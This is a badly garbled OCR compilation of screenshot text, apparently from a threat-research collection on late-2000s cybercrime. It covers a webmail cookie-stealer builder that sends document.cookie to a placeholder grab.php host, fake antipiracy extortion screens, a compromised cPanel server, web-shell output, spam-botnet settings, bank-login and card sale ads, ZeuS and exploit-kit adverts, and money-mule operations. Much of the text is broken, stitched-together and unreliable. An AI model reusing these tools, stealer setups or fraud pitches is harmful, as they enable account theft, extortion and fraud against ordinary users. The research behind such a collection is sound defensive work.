[] 19406 15 a 255.44 2124-7C53 0 seconds 
[] 20689 i a 86.62  O0707-565F 0 seconds 
[J 21179 15 a 72.16 4BE4-E459 0 seconds 
[] 22340 15 a 90.129 287D-8EC2 0 seconds 
[] 23199 18 3.60 C885-66AC 0 seconds 
LL] 23247 15 i~ 1.140 4697-1209 0 seconds 
[] 25183 1 8 @ 01.105  3440-BBAE 0 seconds 
[] 25692 16 @ @ 174.205 18EF-22EF 0 seconds 
[] 27778 15 a 3.76 EC6B-F5F7 0 seconds 
[] 28212 15 a 5a 3C29-FCE8 0 seconds 
[] 28777 16 8 @ 43.120 A40F-290D 0 seconds 
[] 29308 is 62.50  782A-E23E 0 seconds 
[] 30668 15 a 94.21  2092-335B 0 seconds 
[ | oa 1460 65.223 0053-BCAE 1 second 

[] 17115 15 a 40.199 45C4-FBFF 1 second 
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"Generic Webmail Stealer (ro) 


Message | PHP Grabber JS Script. FTP Upload) SMTP Email About | 


Webmail | email.ro |v] X85 Vector | Vector 1 v7] 
©@) Use PHP Grabber 


HTTP Address: http://www. site.com/grab. php 
Send ‘document.cookie’ with parameter: C 


[_]Send 'document.location' with parameter: L 


© Use JS Script 
HTTP Address: 


© Use alert(] (for testing purposes) 
Message: 


<html> 
<body onload=""JAVASCRIPT > 


<l-- Message Content --> 


</body> 
</html> 
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Copyright violation: copyrighted content detected 


Windows has detected that you are using content that was downloaded in violation of the copyright of its respective owners. 
Please read the following bulletin and try solving the problem in one of the recommended ways. 
Enalish 


What has happened? How could it happen? 


During the system scan Antipiracy foundation scanner has You may have been using file-sharing chents, torrents or downloaded the content in 

detected copyright issues. Please take 4 look at the list and choose question straight from the website. In any of those cases you have violated the 

Se ite Ie cis toe coun or eee ED pe ee only rl epee clack bl ectere dba hairless) abner 
; serious | 


paying a Maximum penakies can be five years in prison and up to 
_. Files detected @& 
€) AKO 
Vee 7 
copyright 
alliance MPAA 
Aco-project by ICPP foundation 
Evidence list Used IPs log Type of violation 
176.4.2.0 p2p\warez movie download 
176.4.2.0 p2p\warez games download 
Show details... 176.4,2.0 p2p\warez mp3 download 
Antipiracy news Choose an action 
12/02/2010 If you are sure that you cant have download that content to your PC or there was 
ew antipk a a6 ’ nothing you could do to avoid it, press "Pass the case to court" button and pass the 
Case to court 


If these files belong to you, but you woud rather avoid all the expenses associated 
with settling the issue in court, you can settle your case in pre-trial order by pressing 


Pass the case to court Settle case in pre-trial order 


http://icpp-online.com/ - your source for copyright initiative All rights reserved by their respective owners, 2010 
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A Performing this action is construed as refusal to cooperate with the copyright holder and 
unwillingness to consider pre-trial settlement. If you continue, all the data gathered will be 
passes to copyright protection organizations and to the court. We recommend cancelling 
this action and choosing the option "pre-trial settlement". 


Poe] ne _| 
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Inank you Tor your decision. Ine program of internet piracy discouragement ts based on the concept of every 
citizen having the right to an amnesty if the unlawful exchange of intellectual property (music, films, software 


etc.) does not take place repeatedly. 
You can pay the damages, as well as a fine and procedural expenses to the copyright holder in exchange for a waiver of 


prosecution and criminal court. Down below you will see the bill ssued by our organization. Once the bill is settled, you get 
the right to use the items of intellectual property obtained via the Internet, while all the issues with the copyright holder 


will be settled. 


—————— 
DISCOVER orca | 
occas v4 | 


Security checkout 
STATEMENT 

Description Price 
Legal license purchase $15 
Copyright holder fine $249 
Copyright protection organization fee for the use of software tracking illegal fie downloads $126 
Traffic fee $2 

$7.85 


Total: $399.85 
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Warning! Piracy detected! 


% Pirated content was detected on your PC! 
You are seriously violating copyright by: 


Media files downloaded from torrents 
- Pirated movies from peer-to-peer networks 
- Cracked software from file-sharing services 


Copyright fund has recieved report and has started an 
investigation. You'll recieve subopena in a week 


Cc, } 
(cy cont one 
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@ WebHost Manager -@iRpMozilla Firefox ioe x 


Ble Edt Yew Higtory Bookmarks  [ools 


Ma lid 6 
@ -¢ % & Cntenpeaias- a j 


Most Visted @ Getting Started Ai) Latest Headings @ Get A Free Seedbox -... M4 squid preny caching w 


= GhostMarhet.Net © View forum = Tutoriats [D1 ANODE teenie © WebHost Manager - olive x] . 
Resolver Conf guration A 11.2 
standard on o 
= ph Secunty 
Fix Insecure Permisseons 


(Seripts) 
Manage H Keys 
Manage Wheel Gro 


Quick Security Scan Reseller List 
Scan for Trojan Horses 
Security Center Taos — _ 
= Server Comtacts 
root Total: 695 accounts system 


hs Preferenc alsigns 41signs.com.au dnsoz_Host20 
= aborros lepetus.com vodien_CH10 
= By revellers abe testi com undefined 
absperu absperuconsult.com jrvedina_100 
Reseller Comter = 
Show Reseller Accounts aceubet angelcaubet.com undefined 
addyouru addyoururt.info undefined 
- Service Configuration 
adelante cactuspsis.umi.ce undefined 
Apache Configuratior adnan dylabs.wonetwork.com nirosh_S-25-750 
Bandmin Password 
Configure PHP and Sufxec afair afairfight.com undefined 
Exim Configuration Editor afius abscbnfoundaton.org undefined 
FTP Server Configuration 
FTP Server Selection agecat age.cat undefined 
Modserver C n agprim ogpnNntng .com.au Onsoz_Host20 
Madserver ; akeila thewolfsden.net undefined 
Manage Servece SSL Certificates 
Nameserver Selection okie skila.vonetwork.com nirosh_free 
PHP Configuration Editor akosh akosh.vonetwork.com nirosh_free 
Service Manager 
cPanel Log Rotation alankydd slankydd.vonetwork.com rerosh_s28-$00 
Configuration alexrail alexrailforum.vonetwork.com undefined 
= se Languages alfurqon alfurqon.vonetwork com terosh_free 
a 
wv alse Studeo209mediagroup.com undefined 
Clan ad ea 
alitalk olitalk .vonetwork.com ferosh_s°25-750 Da 


FoxyProxy: Otsabled =) 


| SOB.x0 WO w= 


erms 


drwxr-xr-x 

drwxr-xr-x 
rw-r--r- 
rere 


rer 
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P33 9S3339333555533335555383555 9: 


software: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPa 
sys info: Linux i, 2.6.15-92.e15Pac #1 SMP Tue Jun 10 19:22:41 EDT 2008 i686 
disabled 
id: uid=99(nobody) gid=99(nobody) groups=99(nobody) 
guid: 99 php pid: 28336 inode: 25067879 
pert: curt: globals: mysql: mssql: postgresqlIL: oracle: safe-mode: 
drwxr-x--- 
hd: 159.43 GB of 194.38 GB (82.02%) 


name 


y 


drwxr-xr-* 
drwxr-xr-% 


“rvi-r--r-- 


at 
bs 


") 


a 
= 
“) 
Bs: 
B:; 
Bsc 
B si 
A. 
Bi 
A. 
2 
RB «: 
2E 
As 
As 
ie 
2] 
A 
A 
R 
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A 
2] 
2) 
2] 
A 
2) 
2) 
2) 
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99999999929999999997999979773 
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CPANEL 1 


Notices 


Warning! You are logged in with 
the reseller or root password 


Frequently 


Email Accounts 
Forwarders 

File Manager 
Latest Visitors 


Find 


Accessed Areas 


phpMyAdmin 
Stats 
Main Gomain tree. 
Horne Directory 
Last login frorn 


Disk Space Usage 


46/400 MB 


Backups 


Switch Account 


i- 
i= 


12 Bai: 


we 
=. 


Lt 

E i 
ar 

fe 

a 

mn 8 

a \“ 
tle Default 


ers Address 


A 


MailScanner 
atioGonfiguration 


lO lela 15 I 


Backup File Legacy Web Disk 
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a 
a 
i— , 
i - 
‘ 
Mailing User Level 
Lists Filtering 
a 
Disk FTP 


Description 


new _server_domain [testing] New server domain Ede 
new_server_path (testing) New server path Ede 
bet_update_domain Bot update domain Ede 
bot_update fe Bot update fe Ede 
bot_update_version 0 Bots version to update ia 
bet_update course 0 Bot update target count Ede 
bet_update_id 16830 Force updates to this bot Ede 
bot_alve 1900 Timeout (seconds) before bot is comidered dend = Edt 
send_eterval 7000 [bot] Interval (seconds) between sending single emails Edit 
peg_mterval 120000 (bot) laverval (seconds) between contacting server = Edt 
tmrot om [bot] Tamecat sendirecieve Ede 
fks_xchg cous = 1 (ot) Links exchange cours Ede 
max_jetters 400 [bot] Lams of maiko adresses mamber per task Ede 
threads 10 [bot] Number of threads Ede 
mx_bad_maxcout 2 [bot] MX ties before giving up Ede 
readomization level 10 (bot) Randoersization level Ede 
seed_ratio 100000000000  Noemal to seeded addresses ratio Ea 


2269 


[341] 


22665 


[342] 


iii : 


[343] 


22666 


What are the bank logins and credit cards available? 


Some Of US \ UK Banks Available Now 


e For United States Of America Banks 


Preview 
rs 
| Download 
| Download 
| Download 
| Download 
| Download 


| Download _| 


Between 30k -312k| 4008 up to 


100k=600$ Download 


Halifax Between 20k-180k| _—450$_~— | Download 
Nationwide _|Between 15k-230k| _—450$_~—s | Download __— 
Lloyds TSB [Between 10k- 400k] _—600$_~— | Download 


If You Are Not Able To Raise The Amount For Any Of The Logins. I Can Make For You Any 
Transfer To Any Bank Listed With Upfront 250$ And My Share 20% 


Payments With : E-gold, Western Union, Moneygram, Moneybookers. 
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Uploaded files 
Logout 
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Information: 


Drotile 
SMT date From date (4d.men) 4 
GMT time 
- Countries Compld's 
tatistics: 
ets rps 


Sumenary 


Botmet: 


Outeut Hormel ¥ 


slow) 


Search wth template 
Search 


d files 
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{Q) What is 
iA] is a mix between the Zeus T Set attack toobot that will steal al wformanen logerd on the computer Afier beng rederected to the beow ser explowts. the 2eus bot wall be mistaed on the vxctens 


computer and start logging all cut poms 


5. Thes mchodes the 


berury 


af FTP connects 
read bankong date 
Steat creda cards 
Phas US, UK and RU banks 
Host file overnde 
AS other Zeus T frames 


ts voewer unter graded 


Ferfot erploe 
1 Opere caphet 


A dean area to view states 


We alse hout noemal ZeuS chents for $ 


This inchades s fully set up panel 
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cutwail2 for the last day 8 
80 | : 


70 
60 | 
50 
40 | — | bh thet | 1} | | | Se hese A Ee 
30 } } 1 } | Pe 
20 


10 


io} - 
16:00 18:00 20:00 22:00 00:00 02:00 &:00 06:00 08:00 10:00 12:00 14:00 
WM cutwail2 avg Average 6.33 rps Max 70.88 rps Min 0.00 rps 
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_) nttpe\www.formyip.com 


Datel nit lame 


Fing iP Asgress Country | Che <i 2 eee Cootact gn 


Cenc ene! ty 
eA el I oe sly 


Your IP is 213. 


HIDE YOUR IP 


MRALN More abowt IP 


Your Country is: 


Remote IP Tracker™ 


terete > 2 |P Agcress of yo eat 


SH gm srl ogt 53! hg 
Se es Se 


ForMylP.com” 


Quick and easy way to find your IP address. 


[350] 


CYBER THREAT MATRIX 


Estimated Military Current Basic Data Intermediate Data Advanced Data 
Intent Estimated Threat 
Spending Capabilities Weapons Weapons Weapons 


NY &N NH WwW & 
nv Oo @®O WwW &® W 


Rating Scale: 1= Low 2 Limited 3= Moderate 4= High 5 = Significant 


Estimated Miltary Spending is in Billions of U.S. Dollars 
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Mateoch. 6, Aoet 2009 22127115 


Mateoch. §. Aort 2009 2223123 
Mateoch. 6. Aort 2009 22/1319 


Mateoch. 6. Aord 2009 2199114 


Mateoch. 6, dort 2009 21:43:13 
Mateoch. §. Ard 2009 21:40:36 
Mateoth. €. Aort 2009 21137114 
Mateoch. §. Aord 2009 21133103 
Mateoch. $, Aort 2009 21131132 
Maheoch. 6. Aart 2009 21126143 
Mateoch. §. Aort 2009 21124128 
Mateoch. 6. Aort 2009 21123104 


Mateoch. 6. Agel 2009 21114139 


Mateoch. 6. Aort 2009 21111100 
Mateoch. $. Aort 2009 2102113 
Matteoch. 6. Aor 2009 20034129 
Mateoch. §. Aort 2009 2032129 
Mateoch. 8. dort 2009 20146109 
Mateoch. §. Aort 2009 2031121 
Mateoch. 8. Aort 2009 20:26:66 
Mateoch. 6. Aor 2009 20728143 


Mateoch. 8. Art 2009 20/26128 
Mateoch. 8. dort 2009 20/23103 


Mateoch. 8, Aort 2009 20720142 


Mateoch. §. Aort 2009 20017141 
Mateoch. 8, Aort 2009 20014137 
Mateoch. 6. Art 2009 20011109 


Mateoch. 8, Aprt 2009 20104114 


Mateocth. 6, Agri 2009 19147106 
Mateoch. 6, dort 2009 19143119 
Mateoch, 6. Agel 2009 19143117 
Mateoch. 6. Aort 2009 19/24:25 
Mateoch. 6. Aor 2009 1922129 
Mateoch. 6, Aorl 2009 1919102 
Mateoch. 8. Aort 2009 19106129 
Matwoch. 6, Aort 2009 19:00:31 
Mateoch. 8. Aor 2009 18/90139 
Mateoch. &, Aort 2009 18146103 
Mateoch. 6, Aort 2009 18/36122 
Maneoch. 6, Aort 2009 18/33/33 
Mateoch. 6, dort 2009 16/32123 
Mareoch. 6. Aort 2009 18/22113 
Mateoch. 6, dort 2009 18:02:38 
Mateoch. 6. Aart 2009 16/44/08 


PATS S STFC PFSTSESELSLESSesrese 


Weeerhee reese e she eeeeeeseee 
Pyyyayvsssvsyss+aevsyvsysyyyey 


? 
? 
? 
? 
? 
? 
? 
? 
? 
? 
? 
? 
7? 
? 
? 
? 
? 
? 
7 
? 
7 
7 
7 
7 
7 
« 
7? 
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Top 50 riskiest search terms in the United States 


Maximum — Average 


Keyword Risk Risk Category 
word unscrambler 50.0% 16.1% Gear, Gadgets and Games 
lyrics 50.0% 14.8% Lyrics 
myspace 50.0% 2.9% Web 
free music downloads 42.9% 20.7% Free 
phelps, weber-gale, jones and lezak win 4x100m relay 40.0% 9.5% Sports 
free music 36.4% 12.1% Free 
game cheats 36.4% 16.3% Gear, Gadgets and Games 
printable fill in puzzles 36.4% 7.6% Miscellaneous 
free ringtones 33.3% 7.4% Free 
solitaire 33.3% 9.1% Gear, Gadgets and Games 
miniclip 33.3% 5.6% Gear, Gadgets and Games 
make money 33.3% 3.0% How Do I? 
viva la vida (coldplay) lyrics 33.3% 10.2% Lyrics 
touch my body lyrics 33.3% 5.2% Lyrics 
love song lyrics 33.3% 48% Lyrics 
lollipop lyrics 33.3% 4.6% Lyrics 
my life (lil wayne) lyrics 33.3% 2.6% Lyrics 
weather.com 33.3% 2.3% News 
lowes 33.3% 9.6% Shopping 
the price is right 33.3% 10.6% Showbiz 
kimbo slice 33.3% 6.7% Sports 
metacafe 33.3% 7.2% Web 
[361] 
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Category-specific risk summary findings in the United States 


Category Maximum Risk (Average) Category Risk (Average) 
Lyrics 26.3% 5.1% 
Free 21.3% 7.3% 
Web 13.9% 2.1% 
Gear, Gadgets and Games 12.5% 2.7% 
Olympics 12.4% 2.1% 
Videos 12.3% 1.7% 
Celebrities 10.7% 1.4% 
Music 10.7% 1.7% 
News 8.6% 1.3% 
Miscellaneous 8.3% 1.1% 
Travel 7.4% 1.2% 
Food and Drink 7.2% 0.7% 
Showbiz 7.1% 1.1% 
Election 08 6.9% 0.5% 
Shopping 6.8% 0.7% 
How Do I? 6.5% 1.0% 
Astrology 5.4% 0.4% 
Sports 5.3% 0.6% 
Destinations 5.1% 0.8% 
Health 4.0% 0.4% 
Economic Crisis 3.5% 0.5% 
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Matched 23 of 332602 


es mo 
2009-09-26 14:28:24 QBN x anal 93.98:1743 LOLIGG1110 bo wt » 23 
2009-09-26 13:88:26 2x ened 93.98:1212 LOLIGG1110 be wt » 23 
2009-09-26 13:2024 2B s anal 93.38)1008 LOLIG61110 fo wt » 23 
2009-09-26 23120033 QBN x anal 93.98:3302 LOLIG6:110 bo owt » 23 
i ; ‘ 92.98:1009 LOLIG61110 bo wt » 23 
eens ne 93.98:1083 LOLIG61110 be wt » 23 
2009-03-08 09:18:33 2EMe x amte 92.98:1006 VOL1:23 < watQepel> < sreclenienkk ol 
2009-03-07 19:68:29 2EMx anal 93.98:3370 LOLIGG1110 be wt » 23 
2009-03-07 19:18:29 2EMex anal 93.98:3318 LOLIG61110 bt » 23 
2009-03-07 1848/32 QEMe x amie 93.98:1231 LOLI23 <ol> « # mclerakeggret com> 
2009-03-07 18146032 2EM x anal 93.98)1261 LOE 1661110 bo wt » 23 
93.38,1033 BOL. 166:110 
2000-09-07 10:90:29 2 
COP-09°07 10:26029 ZAIRE S annd 93.98)1063 POL166:110 bo wt » 23 
93 38,1430 BOL. 166110 & - 23 
2009-03- 23 2 
COP-OS-08 LOS AES anal 93.38:1427 BOL.166:110 & Lad ” 23 
2009-04-26 22/0343 2EIMEx eoad oo 38)16e4 LOL1661110 bt 23 


The domain is registered to supp3ortnewest@safe-mail.net and the DNS services are 
courtesy of one.goldwonderful9.info; ns.partnergreatest8.net; back.partnergreatest8.net; 
two.goldwonderful9.info which are the de-facto DNS servers for a huge number of related 
and separate [3]money laundering brand portfolios (the quality of the historical CYBERINT on 
behalf of Bobbear is the main reason why [4]commissioned DDoS attacks were hitting the site 
last year). 


Taking down the group’s command and control domain is in progress. 


1. itp//Adanchev. blogepot con/ 2000/07 jnoney-mule-recruivers-use-aaprox=- fast. Hal 
2, htvp://adanchev blogspot, con/2008/10/noney-mules-syndicate-actively heal 

3. http://www. bobbear .co.uk/ 

4, http://adanchey blogspot .con/2008/11/ddos-attack-against-bobbearcouk. html 


5.5.10 Inside a Money Laundering Group’s Spamming Operations (2009-05-26 18:41) 


2271 


Register Now 


Svetlana B. 


Age 21 years old 


Age range of man: 25-50 y.o. 
My Languages: Russian 


66 | want to learn to live in a harmony with 
people around; to become a happy mother, 
trustworthy wife; to master some foreign 
language, maybe English; to be independent. 
| want to meet a man who is kind, reliable, 
confident, well-mannered, with a good sense 
of humor, who can take and give love, 
romantic and caring. 


Send message a 
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Hewin Peuteen (Wired Mews! 11 mination 
ownno Dencher / enih Dencher’s Sess Hochees Aesoaht Eplopey Potiowts via Compater Eind 
Massive IFRAME SEO Poisoning Attack 

Tero Day eative | OV Lae 11 mieten apo 

— Last week's FRAME injection attack is slowly aa OWE Final {and another wiemerf) Find 
iecring ab a whet looks te b lenge scale web application wdnersbaties suet of bad eo 
high profile sites. Following the timely news coverage, Symantec's rating fer the attack as medium risk Mai | Capen: 20 minetes ap 


inate a9 
Dent Keer I dont know. — Wey le hoo hard er 
RELATED: rca ee 
Breese 78 manele ap 
Major Web sites hit with growing Web attack — A tiossormng Web attack. 2 type of age ey Blogger Shut oma 
first reported by secunty researcher Dancho Dancher earter this month, has expanded to ht more 
than a maken Web pages, including many welkknown sites. — “The number and importance of 


= > WARE VOIR? tes enctpepas odenny has enputnsebte cama dapte shai 1g reverwe in more 
than 60 years. — According to new data released by the Newspaper Association of Amenca, total pant 
advertining revenue 


Gmcwnsior: Newspaper Association _. Podcasting News. pardCortert org, TECH BLORGE com. Andy 
Beals Marbeting Pion, CNET News com. Susan Mems’s Bios. Biogcoam. Recoverng Jounalrsl. 
Siecon Alley Inaeder, Remenesbo and Content Bndges 
PELATED: 
BD oumcan Rey | Leumcrentiy 
— Figures released by the 

Association of Amenca show that the deckne of newspapers is more 
fapid than previously thought, with total par advertising revenue m 2007 plunging 
9.4% to $42 bikon compared to 2006, the biggest drop in revenue since 1950 
Orscwsstere The Beal McCrea and WebMietns 2Gury 


3G IPhone launch seen in 2nd quarter — New YORK Reuters) cles — Microsot 
a hagiatas GUPUTE is eappessts tauneh abipoapesd ebeioee vntenel@eene case about our use of 
in the second quarter and produce as many a5 & mabon of the devices in the thind ‘Server ee dake 
quarter, according to Bark of Amenca. “shal we have to manage. .. NewsGator 
Grecensions CNET News com and The Unoticial Apole Weblog 
1B com Monts Torte: - Where 20 bart Reataration 
=— Week Wet cae 
registrabon dscourt: one more week, 60 now 
Apple picks trusted supplier to assemble 3G iPhone fare March 311 sore up to S200 on conerece es or 
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DDOS v 3.0 
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cometi32.da 
KCerieeHT Mpeinomerent 


Virenene 29.08.20 
Pasmep: 544 KB 


AtpeBy Tex: (ofenes “TO Mporpamwa cosgaeT 


cTBO coeannennn 


ONeKb 
Tvuposars 8 Ke 
Ae pesyneTaT ne 


“arta 


6A fONrO KAATe 
bAoynorpebnanre 
noora TONbKO ANA O3HaKOMNEHHA 


+ He 
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rine Bote: 0 Online Prowy: & 


=) =) | 


dos.rar beghanonym. Msinet.ocex MSWINSCK,.. RICHTXSZ... 


wirsock. a TexcToen 
Aon yrenrdr txt 


Total Tasks 
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ed ABOUT US SERVICES 
ay I 


WELCOME 


The company was set up in 1990 in San Francisco, the 
b 5 inancial « wt 4 ot fest & was carrying t 


tne eased and b d 
NYS Department of Sume 


WHAT DO WE OFFER 


Brokerage Services 
Brokers: 


—— 


MEMBER LOGIN 


Eoroct oaseword? | Senate 


REGISTRATION 


@ 
@ 


CONTACTS 


UPDATE: The command and control domain has been taken care of courtesy of the brisk 


response of OC3 Networks Abuse Team. 


Next to the efficiency and cost-effectiveness centered cybercriminals having anticipated 
the [L]outsourcing (Cybercrime-as-a-Service) model a long time ago, there are those self- 
serving groups of cybercriminals which engage in literally each and every aspect of cybercrime 


- [2]money mule recruiters in this very specific case. 
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(Wed Aug 27 11:14:27 2008 - Thu Aug 28 11:14:27 2008) 


ta0i / WoLeys 


Packets/sec 


12:00 14:00 16:00 18:00 20:00 22:00 00:00 02:00 04:00 06:00 08: 00 10:00 
@ multi/broadcast In @ Total Packets In @ multi/vroadcast out @ Total Packets out @ Dropped 
In/Avg NUcast = 0,000 In/Avg Ucast = 989.055 Out/Avg NUcast = 0.000 Out/Avg Ucast = 107.150k 


[374] 
Uptime for Check interval: 5 minutes 
hiteh IP-number: 69.192.26.135 
WHIEBNOUSS GOV Total uptime: 99.96% 


Month summary Detailed downtime log 


Date _ Uptime Downtime _ Monitored Month . Up/downtime | 
2009-07-09 100% : th 42m Jul 99.13%, 1h 40m 
2009-07-08 100% ; 24h Jun 100%, - 

2009-07-07 100% : 24h May 100%, - 

2009-07-06 100% : 24h Apr 99.99%, 3m 

2009-07-05 1h 40m 24h Mar 99.96%, 16m 

2009-07-04 100% : 24h Feb 99.42%, 3h 55m 
2009-07-03 100% : 24h Jan 99.99%, 2m 


2009-07-01 100% - 24h 


Month | Up/downtime | 


99.13% 1h 40m 8d 1h 42m = Oak 

Methodology: Read more about how GIGRIB determines if sania 99.99%, 2m 

www whitehouse gov is down. 100%, - 
Sep 99.95%, 22m 
Aug 99.97%, 13m 
Jul 99.98%, 7m 
Jun 100%, - 
May 100%, - 
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Us Auctions 
“VE 


A Better Place to BUY and SELL 
US Auctions Live notice: 


US Auctions Live has been attacked by hackers and our 
servers had a DOS (denial of service) due to this 
attack, 


We are working hard to re-establish all services and 
repair all databases. We apologize for the 
inconvenience and will move as fast as we possibly 
can. 


Our hosting provider, Hostmonster.com has said they 
will not renew this account due to the DOS so we will 
remove ALL our accounts from them and move it to a 
new more professional and better provider. 


Our anticipated return to service is 48 hours. 
Thank you for your patience and patronage. 
Again, we apologize for this inconvenience! 
The staff, 


US Auctions Live 
July 06, 2009 
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(FD Security Settings 


Frewal | — IntrusionPrevertion | — Loggingand Tracing «=| «= Management 
Application Control | Buffer Overflow Exploit Prevention || Antivinus/AntiSpyware 
I Enable Application Control 


Known Applications 


Add Application Control Rule 


Rule name: IMicrosott Messenger] 
Detect application using 


1 Path: [C:\Program Fies\Messenger\memsgs exe Browse... | 


When the application thes to connect to a network 
© Letit connect 
© Block the connection 
© Terminate 2 


ee ee 
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port 
Cow 
port 
Cow 
port 
port 
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7 ows ewe 
is — 


arecing 
ereredis tr anerer ca 
- 
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Defence 


Map mage courtesy NASA 
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WestHammer®: Christmas Edition 


Cxyyaeme u coecem Hem HacmpoeHuR? He yycmeyeme Poxdecmeencaud u Hoeo2zoduud Oyx? 


Xomume sapa6omams neped npasdnuKamu, HO y Bac Hem HEOGxOOUMbA UNCMpyMeHMOE UNU, GbIMb MOXEM, Bi € PacmepRHHOCMU OM EoNpoca YMO 
nodapumsb Opyey Ha Poxdecmeo unu Hoesen) [00? 


Mobi 2naem omeem Ha Bawu eonpochi! 


WestHammer®: Christmas Edition - cozdacm Hoeo20dHee HaCmMpoeHue U CMaHeM HezabbieaeMbim Nodapxom OnA Bac unu Bawux 6nuzKux Opyzed! 
Yeuxanbnesd OuzaGH U 3eyKoe0e OMopanenue 6 Cmune “Christmas” npunecym dyx Poxdecmea 6 10600 dom! 


Nponyxt WestHammer®: Christmas Edition nossmunonnpyerca kax HaGop ANA TeCTHpOBaHHA yASBMMOCTen Bawer©ro NK H NONHOCTHIO COOTRETCTBYyeT BCeM 
COBpemeHHEi TheGoBaHviAM B AaKHOR OOnactH. 


NaKer WestHammer®: Christmas Edition umeet 3 ocHoBHDe BEpCHn: 


“Basic - BepCHA ANA Tex KTO He pacnonoraer MOCTATOY“HO Gonbuim GOQKeTOM HO BCE Ke CTIPEMMTCR NONMYYNTS BCHO MOGlb COBPEMeHHBIX TEXHOFIOTHIT. 


HeCKONbko ypesan HaGOp Cnnofros, ANanBie 4HCTEH, 


* Standard - pepcun ANA Tex KTO pacnonaraet cpequnm GiogpKeTOM H XOWET BLOKATE M3 CBOero ThacbiKa Gonbwe. 
HaGop cnnoiros yaennyex no cpasHermeo C BepCHen Basic  NomMMO BCero NpOvero CxMAKa Ha YNCTEN 50%! 


"Professional - feBn3 npodpeccnonanocs “Bepn oT KHSHM BCe!” HB AAaHHOM CryYae OH NONHOCTEHO Ce6a ONpagAbiBae;r. HenpeBs0/QeHHAR MOg|b 
OCHOBAHHAR Hd PenHKApHMpOBaHHOM FLASH cnnoire B CoveTaHmn c GecnnatHiiun “ecTKamm npnHecyT Bam mope HesaGbieaembIx SuouMn MH BNeYaTNeHiitl 


Noxynarn Bepcnnm npopyKta WestHammer®: Christmas Edition Basic n WestHammer®: Christmas Edition Standard ae: nony4aere BOSMORHOCTE MX 
oGHoeneninn 10 Gonee mouHoH BEPCHH NPOCTON LONNATON PasHMUb! B CrOMMOCTH NHUeHsHt 


CpasnirenbHan TaGnmya UeH H XApPaKTepHCTHK pasnHbixX BEPCHit WestHammer®: Christmas Edition: 


FF OPERA PDF NEW SNAPSHOT PDF SNAPSHOT pyr) 


EMBED OLD REALTIME* 


BEPCHA MDAC 


BASIC 
STANDARD 
PROFESSIONAL 7 


*SNAPSHOT REALTIME - SNAPSHOT cnnoit etanonHniogl 2anyck .exe 8 peantHom Bpemenn Ges nepesarpy3xn MK. 


Bonee nodpo6xo 06 ucnonssyemem yaseumocmax Bet moxeme npowumame e@ pasdene HABOP SKCIINOHTOB. 


[385] 
@ green eggs and spam Pile &3 
b Sort a Siog 34012 Gmail Accounts: | tkeuyzryixzy:wtnetre + [js 
[-Z Campaign |) Messoges | ©) Proxies (b Options | i) Howtouse Messoges | 
Email List Processing Sent Total 
Welcome to g-mager Seed Count: 0 
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recs oath 


What do the known money laundering aliases such as Value Trans Financial Group, Inc. 
(valuetrans.biz); Advance Finance Group LLC (af-g.net); ABP Capital (abpcapital.com); Pre- 
mium Financial Services (advance-financial-products.org); elop Group Inc. (etop-groupli.cc); 
Liberty Group Inc. (libertygroup.cc); Eagle Group Inc. (eaglegroupmain.cn); Star Group Inc. 
(eagle-group.net); DBS Group Inc. (dbs-group.cn); FB &B Group Inc. (fbb-groupli.cc); Advance 
Finance Group LLC (af-g.net); DC Group Inc. (dc-group.cn); IBS Group Inc. (ibsgroup.cc; 
ibsgroupli.cn) and FCB Group Inc. (fcb-group.cc) have in common? 


It’s a 31,000 infected hosts botnet which they use exclusively for spamming. 
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REACTOMTENE HG 


Daun Mim, lon, OIMecTRO 


Aata pox ACH UH 


Mpeanaynpe AOKY Men of OSpasonaniny 


Berynureassme MCHA 
Nocryn, A(a) a 


Saepurs(a) OGyrKenHE a 


Hopaaruninai MEPHOS ObyueHHy HO ONNOK hopme 
Hampaasenne/creyasnocr, 
Cocywarnsayun 


Kypcomme Pa6ornr; 


MCOnCkAR 
OLALPAN eR 


Satie 
Sei 


Cc 


AOOKEHME 
IIAOMYy 


t 


O 
5 
K x 
= 


Pereerpeyvonniny Norse) 


TOAa 
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Yr 


max_int_inc ¢e 
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read tee 


The money laundering organization describes itself as: 


"The company was set up in 1990 in New York, the USA by three enthusiasts who have 
financial education. The head of the company was Karl Schick. At the very beginning of its 
business activity the company provided fairly narrow range of services at the investment 
market. Within 15 years of hard work the company has acquired international standing 
and managed to develop into a global financial holding with the staff of 3,000 people and 
headquarters in more than 100 countries of the world." 
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[nabHan NMposepxa 


Axxa@ynt 


Banane 


Victopua 


OwwcTuT nom 


i 


Mii 


O7 Asrycr 2008 

patote! Hag CepsHhCcom 
NPOBePoK AOMeHOS inn Ha 
Hane B Gnexnvectax 
JABepwerb. 

Of Asrycr 2003 

Sophos o6H0B.neH AO BepCHK 
444.. 

21 Viens 2009 

OGHOBNeHO -KeENesO Ha 
cepBepe. 

14 Vion’ 2009 


Nepenvceana soigeya .. 


Mposepka ceArsox Domaincheck  Tapwdbi 


Check (1check = 1$) 


Enter URL: [ Send | 


a 


ZeuS domain blocklist 
ZeuS IP blocklist 

ZeuS Tracker 
MatwareDomainList (MDL) 


Google Safe Browsing (FireFox) 


McAfee TrustedSource 


McAfee SiteAdvisor 


PhishTank (Opera, WOT, Yahoo! Mail) 
hpHosts 

SPAMHAUS 

SPAMHAUS 

SPAMHAUS 


MalwareUrl 
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FAQ 


Bepcun aHTMBMpycos 


IP NOT listed in the list 
IP NOT listed in the list 
IP NOT listed in the list 
IP listed in the list 


IP NOT listed in the list 
nogpobree.. 


Status:Categorized URL 
Categorization:- Malicious Sites 
Reputation: Malicious 


IP NOT listed in the list 
noanobHee.. 


IP NOT listed in the list 
IP listed in the list 

IP NOT listed in the SBL 
IP NOT listed in the PBL 
IP NOT listed in the XBL 
IP NOT listed in the list 


NononhuTb cueT 
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3 Internet Haganah::Home - Microsoft Internet Explorer 


: Fle Edt View Favorkes Took Help ® 
Om: O- DAO Pow Yerme @ B-Se-TWEtBVs | 
| Address | 48) baton epansh.org.djhaganah lindes.hed > oe 


‘Thas is our fifth year of operations 
We ave stil here and able to do the work that we do thanks to support and donations from people such as yourself 


You can contnbute via PayPal: 


or send check or money orders to: 


A Aaron Wessburd 
PMB #239 
1809 West Main Street 
Carbondale, IL 62901 


contact 
contact at sofir dot org 


RSS feeds: 
Imemet OSINT Off-topic 


Intemet Haganah is a project of... 
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>) JIOBEPEHHOCTb 
 Y 77 m 21 


| Fopon Mocksa 


~~ Frepes (awe), etaacrs, wal eae eee) 


oe) fox Mhinyora o = 
